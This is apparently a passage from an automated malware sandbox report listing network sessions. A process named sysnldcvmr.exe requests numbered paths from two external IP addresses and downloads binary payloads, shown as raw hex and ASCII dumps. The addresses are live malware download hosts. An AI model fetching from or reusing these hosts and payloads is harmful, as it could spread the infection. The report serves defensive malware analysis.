                                                                                                                  Data Ascii: i4hlQJo[Rx[n@gU56QWO.|yDE.brfGY<NE$;F@6G*2r.2(z|FS\e<klZ'>'ex63{A' !w5wG!(sI1GkrH}I=0$P+k8fm3zLiJIFM
                                                                                                                  Nov 30, 2024 01:56:11.086991072 CET1236INData Raw: d3 82 1d d8 c6 ca 7a 16 e7 d8 d4 24 41 68 71 29 24 f7 9c fc aa 1d 63 cb 0b 19 e5 5f ec ba 5d 5c 13 de 51 76 e8 90 4f b4 84 37 e2 4a 79 5f c9 d1 f9 bf ad 8b 45 44 3b 42 31 d9 71 d7 06 38 b7 e8 a8 64 c5 04 e2 b6 0f 4a fc c7 a8 f4 9f cc 9d 35 c4 2d
                                                                                                                  Data Ascii: z$Ahq)$c_]\QvO7Jy_ED;B1q8dJ5-H?];91oElK4V #~U#T\^rtBLZhpiVp_Z=9?Pv2DCVE#,uoL@Vm0Ke,3,q>
                                                                                                                  Nov 30, 2024 01:56:11.087002039 CET248INData Raw: 9a 2f 39 d8 07 79 ab 65 57 3a a0 33 03 a7 6e dc 09 8f 28 23 93 a8 0f b2 67 f8 e0 3c d7 1c 14 d1 0d 74 72 cb 93 e7 37 3b 47 96 7a 62 49 9f ed c2 3d dc 94 0b 56 d9 42 83 8d 53 84 59 ca 7e 66 98 6e 7c ca 6f 5f f5 c3 5e 35 1a 97 bb 2e 7e 2f 13 b6 33
                                                                                                                  Data Ascii: /9yeW:3n(#g<tr7;GzbI=VBSY~fn|o_^5.~/3h_Cy1Hz*URy^lxvYf?X8/ qa,Y+s6+zyyfId,}<UF<;'j"A_q_lYG$t`
                                                                                                                  Nov 30, 2024 01:56:11.087434053 CET1236INData Raw: f0 88 d1 dd 88 8b 89 c0 d8 bc e6 2d 69 10 5e aa bd 83 ab ee a4 fc 89 4c 76 23 ba 16 d5 7f 3b d5 16 7b 0e ca ee 2d fc 35 a2 ae 46 bf f2 0d 2c 18 ee 64 16 13 85 25 f3 19 93 00 b1 04 c5 c9 fb cf 8d 26 c9 01 93 23 b2 bd 4b 28 83 a5 0a b7 94 e6 4d d8
                                                                                                                  Data Ascii: -i^Lv#;{-5F,d%&#K(MW,gf"=g,Fnl*8NBa&6`=/s*:[ n*[c|oic5dPFi{~)E~R"<t%E\o,7*'d:JKr
                                                                                                                  Nov 30, 2024 01:56:11.087575912 CET1236INData Raw: 3e d7 e2 1d 60 06 01 e8 6b f4 13 e9 af a5 c1 6c 23 b4 3c d6 0f df cc e8 aa 41 51 3d c3 4f 46 b4 97 04 44 79 86 da 65 f8 25 98 b1 e7 0c 7c b4 5b d2 c2 d8 c9 fb a9 ba 4f d7 ae ef ae 15 3d f7 45 78 cf 26 7e 2d d8 95 38 20 9e 35 1a 21 3f 33 ea d5 fb
                                                                                                                  Data Ascii: >`kl#<AQ=OFDye%|[O=Ex&~-8 5!?3{`v*nker2V#kZHqxc.";E.qMI>XI^ ]WYC$yP['O:*@zZ-^
                                                                                                                  Nov 30, 2024 01:56:11.087590933 CET248INData Raw: e7 83 33 8a 59 ce bd b9 d7 ac 1b 2d c3 d2 f4 07 de 07 41 7e de ac d3 c5 ea da 3d 38 89 45 53 d8 d5 37 22 4b 38 8f c7 e8 5c 02 49 18 ad 12 3b a2 56 93 22 36 53 46 2d 16 79 c7 fb a7 1f 1c cc ec a3 86 55 3a f4 47 55 d9 1e c0 04 76 7a 58 66 a1 28 fa
                                                                                                                  Data Ascii: 3Y-A~=8ES7"K8\I;V"6SF-yU:GUvzXf(t2yJ@j+l|t5<{[!h c_Kx=ACK~#O7L]=D,MGm^+bQg^ oK$z4H4%+5r[E?
                                                                                                                  Nov 30, 2024 01:56:11.087829113 CET1236INData Raw: e5 df 71 cd 37 76 0e c6 52 6e a4 8e 0f 16 54 21 74 70 c2 47 ba 9f b9 41 2a a7 75 4f 04 0a dd 7f b1 33 8f fc 9f be 05 51 b6 b5 5c 37 b9 f0 0c 80 09 af 3d a8 94 d8 7b 38 4e 80 49 b7 4d 50 15 04 c8 99 c3 12 c9 0c 58 5e 7e 75 a6 02 8d db a6 68 23 16
                                                                                                                  Data Ascii: q7vRnT!tpGA*uO3Q\7={8NIMPX^~uh#g\98c2"*AC&h-nQe)6@kWvLq+&DsbQobfeg-7, sKVN6L$=q%H2}j_Y^7.7,e1zb
                                                                                                                  Nov 30, 2024 01:56:11.088066101 CET1236INData Raw: 78 e1 80 d4 e8 44 8d 9d b8 f2 04 a8 25 0c af d0 b2 bb 8f 07 96 dc 25 ee e9 be 9b 84 8a 7f 78 e0 59 a8 24 91 6a 6d e1 17 d7 b3 c6 2f 4f 2f 7b cd 2c 5f 5d b2 f1 4e d7 ea 76 fd dc ff e9 c2 c0 cd 33 01 ef 79 32 5e 5b 14 d6 63 50 61 53 9e d5 1e 5a b3
                                                                                                                  Data Ascii: xD%%xY$jm/O/{,_]Nv3y2^[cPaSZ!;]CJhc#V.WB;0Wt{dW1j/owjun2}$RV0awDeSfb!^zK}BvH*@%n3lo 6f'5-
                                                                                                                  Nov 30, 2024 01:56:11.207731009 CET1236INData Raw: 86 7f b2 4c cf 50 34 41 d8 dd 51 ff a4 a8 19 d8 e2 0a 05 af 73 0f f4 c1 b8 7f 06 d7 e1 cc e8 7e 9e f9 38 99 04 b4 23 f8 16 7c 08 17 61 63 1c 04 12 9a d0 22 b5 1e 15 b6 cf 26 76 b4 4f e3 18 85 c9 98 eb af bd 98 13 41 62 6a a4 76 b4 e9 35 91 2c d3
                                                                                                                  Data Ascii: LP4AQs~8#|ac"&vOAbjv5,K&{/'e)9qZ3{3'C+,qN*!v.*Dt!R:&re=L<.-X8;bqn%/`az\ube%I#&s


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  15192.168.2.449796185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:56:13.349524021 CET166OUTGET /5 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:14.740977049 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:56:14 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  16192.168.2.44980791.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:56:17.987792015 CET166OUTGET /1 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  17192.168.2.44981991.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:56:21.810709000 CET166OUTGET /2 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  18192.168.2.44982791.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:56:25.647547960 CET166OUTGET /3 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:56:26.963535070 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:56:26 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  19192.168.2.44983991.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:56:29.219527960 CET166OUTGET /4 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:56:30.538666964 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:56:30 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  20192.168.2.44984791.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:56:33.027295113 CET166OUTGET /5 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:56:34.304928064 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:56:34 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  21192.168.2.449860185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:56:37.984215975 CET166OUTGET /1 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:39.313324928 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:56:39 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 8960
                                                                                                                  Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "671230ee-2300"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                  Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                  Nov 30, 2024 01:56:39.313410997 CET124INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                  Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TE
                                                                                                                  Nov 30, 2024 01:56:39.313932896 CET1236INData Raw: 4c 42 63 2a 88 24 37 be 0d 52 6c ca 2d 11 74 6a 4f 1c 96 52 71 18 29 06 58 2e ed 84 4a d6 69 35 40 34 36 fa a4 03 08 6e 3d cc 79 d5 da 9b cd e5 49 62 a0 15 b7 25 90 b3 49 fd 19 9c 00 1d 6e be 47 6c 88 53 1f 7a bc b7 33 91 33 28 07 fa a3 3a 26 01
                                                                                                                  Data Ascii: LBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM#~Ei
                                                                                                                  Nov 30, 2024 01:56:39.314008951 CET1236INData Raw: 93 d9 75 84 fb 01 3a 8d e5 b7 91 3a 76 75 6b d3 6c a6 b9 fe a4 2f 47 5e 75 68 33 a0 76 87 6a 1a b3 ec d4 d7 f1 a1 5a c1 ff 30 43 2c 25 b0 ea 1e 1b 51 9d 20 86 8b df 35 f9 6d 0b 1e 79 38 0d bc 65 b9 0b 84 27 d9 2b 6f f9 7b 17 0e af 44 b6 38 8a 0b
                                                                                                                  Data Ascii: u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9[h1_&},fOnN
                                                                                                                  Nov 30, 2024 01:56:39.314018965 CET248INData Raw: 7b 26 54 bb 8f 3b 49 5d 85 8d ef 23 d3 03 bf d7 a3 12 7a 16 b2 c0 04 d2 f8 59 ed 93 77 a1 9b 16 eb 38 08 4f 1f f3 41 a0 7b 13 e5 00 b1 6b dd 19 4b ed c5 fb 8c e7 26 47 0f 46 fb 4d 58 09 99 98 14 46 4a 2b a4 8e 49 0f b4 a7 97 24 3f bd 72 2d 3a 50
                                                                                                                  Data Ascii: {&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 NTSgA7|I5Y&hOhAcUz(S7S})!s%F'GWfS\D5LR)r9X+%
                                                                                                                  Nov 30, 2024 01:56:39.314542055 CET1236INData Raw: 89 71 be 79 12 82 18 46 ac a6 88 ba 3d 5a 96 af 3f a5 ef 1f e9 da 21 18 33 69 f5 e3 08 b7 9c 52 4d 92 10 87 70 e8 6c 0e e9 14 c4 c1 93 a8 2f 42 72 dd 86 d8 05 a9 18 6c fe 42 37 2d 2a 59 74 3b 7c 72 a6 7f bc 53 8f 84 17 e1 ce b6 df 7b 2e cc fe ad
                                                                                                                  Data Ascii: qyF=Z?!3iRMpl/BrlB7-*Yt;|rS{.gdfow%f.tBH{:Ba{%dPL(Q6V>m:p@Nx!I EKJ*{s`#UWr|Df~Y:<@c?-G
                                                                                                                  Nov 30, 2024 01:56:39.314666986 CET1236INData Raw: b8 f9 77 31 77 35 65 64 c5 bb ba 51 07 10 a4 ce 44 d9 db b7 71 e2 b5 48 ee fa 05 91 3d 1b c9 c6 91 2e ff f0 a9 7e 6f 84 73 ba 58 6f e7 75 df 92 c7 48 7f c8 65 50 e5 64 b8 74 ba 6e 71 60 59 36 47 34 c4 89 40 bc 81 34 47 fe 22 ff eb 45 4c 97 ef 2a
                                                                                                                  Data Ascii: w1w5edQDqH=.~osXouHePdtnq`Y6G4@4G"EL*-D$hOYCMt;Eby;tQfqV{#btFGqNPs%#@#&AG =OPp*uLx!$A<k_xmO1>
                                                                                                                  Nov 30, 2024 01:56:39.314677954 CET248INData Raw: c7 16 06 88 4f a6 d0 e2 07 16 8f d1 6f 4f ed 61 fd 2f f4 a0 9c 03 da 7f 60 b3 09 01 fb 75 30 18 7f f9 60 5d c4 9a c2 7e 36 ce f1 82 6c 67 ab 4d 68 f2 77 f9 52 c2 4f fa a0 61 6b e3 3a e6 0e 25 78 4e 3b a3 59 5d 02 e8 e2 07 c4 08 44 69 97 04 49 86
                                                                                                                  Data Ascii: OoOa/`u0`]~6lgMhwROak:%xN;Y]DiIYj`i@gnK= {}7NWSC"$Z^"Ld($]8,C"e0+Y_%}a\w_ra=N.>e@b#T\@A$FM.1
                                                                                                                  Nov 30, 2024 01:56:39.314934969 CET1236INData Raw: 79 e0 10 dc 1e 09 05 37 4a 4b 50 68 04 09 8c bf 03 d1 17 2c 32 57 3e c1 e9 3e 7b b2 a3 5d 10 95 a7 74 b6 bd fe c6 c9 12 03 83 34 fd 15 69 cf c8 fe 55 b2 ed 61 ec 41 49 bc 64 a0 42 b3 ac 4a 85 83 00 2b 3a 92 4f 22 46 0c 37 26 dd da 56 a0 6e 23 a9
                                                                                                                  Data Ascii: y7JKPh,2W>>{]t4iUaAIdBJ+:O"F7&Vn#Rj*$.z"Wt,qNh"1=3Ib:Y!\fsAF),l;mN|#{S?&P<G5IjYWY>q+fL~W5GXPY?ECjZ@
                                                                                                                  Nov 30, 2024 01:56:39.315186024 CET1188INData Raw: 70 91 81 19 2c 59 8e f1 0a af 73 c4 90 b3 45 dd f9 e2 6e 1b 38 f2 81 c3 da ee d3 fd 57 21 09 ae 12 41 32 4f 75 e6 60 0d 48 d7 82 a7 f1 a9 30 77 2e f3 7a c7 2b ff f9 56 6a 32 57 ca bd 80 37 72 35 81 48 51 9e 7f a7 92 f4 bf ff de 88 c8 93 ee e2 5d
                                                                                                                  Data Ascii: p,YsEn8W!A2Ou`H0w.z+Vj2W7r5HQ]Q(3j?vK={,m@^1?vHl6=Nke&u+bIB`#0s']B4/8>XuP_Q@(^OS$&


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  22192.168.2.449869185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:56:41.710974932 CET166OUTGET /2 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:56:43.014517069 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:56:42 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 10496
                                                                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67154d18-2900"
                                                                                                                  Accept-Ranges: bytes
